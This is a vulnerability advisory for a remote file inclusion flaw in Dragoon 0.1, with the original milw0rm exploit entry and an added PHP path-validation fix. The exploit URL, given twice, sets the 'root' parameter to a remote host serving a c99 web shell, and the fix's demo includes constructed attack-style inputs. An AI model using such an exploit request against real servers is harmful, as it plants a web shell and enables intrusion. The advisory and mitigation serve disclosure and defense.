Vendor: Dragoon 0.1
By: RoMaNcYxHaCkEr
CVSS: 8.8 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: Dragoon 0.1
Affected Version From: Dragoon 0.1
Affected Version To: Dragoon 0.1
Patch Exists: NO
2008

Dragoon 0.1 Remote File Include Vulnerability

Dragoon 0.1 is vulnerable to remote file inclusion. The vulnerable code is on line 23 of header.inc.php, where the value of root is prepended to the path passed to include. The exploit is a request to the vulnerable file with root set to a remote URL, such as http://WwW.4RxH.CoM/PHP/includes/header.inc.php?root=http://rxh.freehostia.com/shells/c99in.txt?

Mitigation:

Ensure that all user input is properly sanitized and validated before being used in any file include operations.
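
One way to apply this mitigation, shown as an added example that is not Dragoon's code or part of the original advisory: the helper name resolve_include() and the temporary-directory layout are assumptions, and the sample inputs are constructed.

```php
<?php
// Added example, not Dragoon's code. resolve_include() and the demo layout are assumptions.
// Reported pattern (header.inc.php, line 23): the include path begins with $root,
// which the request can set:   @include($root.'config.php')

/** Return the real path of $name inside $baseDir, or null if it is not a file there. */
function resolve_include(string $baseDir, string $name): ?string
{
    // Refuse scheme-like prefixes (http://, ftp://, php://, data:) and NUL bytes.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $name) || strpos($name, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    $real = $base === false ? false : realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // The resolved file must still live under the base directory.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed demo: a throwaway directory standing in for the includes/ folder.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . getmypid();
@mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'config.php', "<?php return ['ok' => true];");

$candidates = [
    'config.php',                      // the file the header is meant to load
    'http://attacker.example/x.txt?',  // constructed URL-shaped value
    '../../etc/passwd',                // constructed traversal out of the base
];
foreach ($candidates as $name) {
    $path = resolve_include($base, $name);
    printf("%-32s => %s\n", $name, $path === null ? 'rejected' : 'allowed');
}

// Hardened header: the base directory is fixed by the script (use __DIR__ in a
// real file), never read from the request, and the file is loaded only after
// resolve_include() has accepted it.
$path = resolve_include($base, 'config.php');
if ($path === null) {
    exit("config.php missing\n");
}
$config = require $path;
var_dump($config['ok']);

unlink($base . DIRECTORY_SEPARATOR . 'config.php');
rmdir($base);
```

Keeping allow_url_include set to Off in php.ini additionally stops include from fetching URLs even if a path check is missed.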
Source

Exploit-DB raw data:

-==========================================[ ViVa YeMeN ]====================================-

# Name : Dragoon 0.1 Remote File Include Vulnerability

# Download From : http://sourceforge.net/project/showfiles.php?group_id=118780

# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]  ( BlackxHat , BlackBox , aLwHEeD )        

# Home Page :  WwW.4RxH.CoM   

+======================================================================================================================+

# Vulnerable Code In File header.inc.php In Line 23 :

@include($root.'config.php')){

# Exploit :

http://WwW.4RxH.CoM/PHP/includes/header.inc.php?root=http://rxh.freehostia.com/shells/c99in.txt?

That's It

Good Luck Everybody

+=======================================================================================================================+

# Greet To :

Tryag TeaM & All Members Of My Forum

# For Contact : RxH@HoTMaiL.iT

# Fuck Own Life  :( 

-==========================================[ ViVa YeMeN ]====================================-

# milw0rm.com [2008-04-07]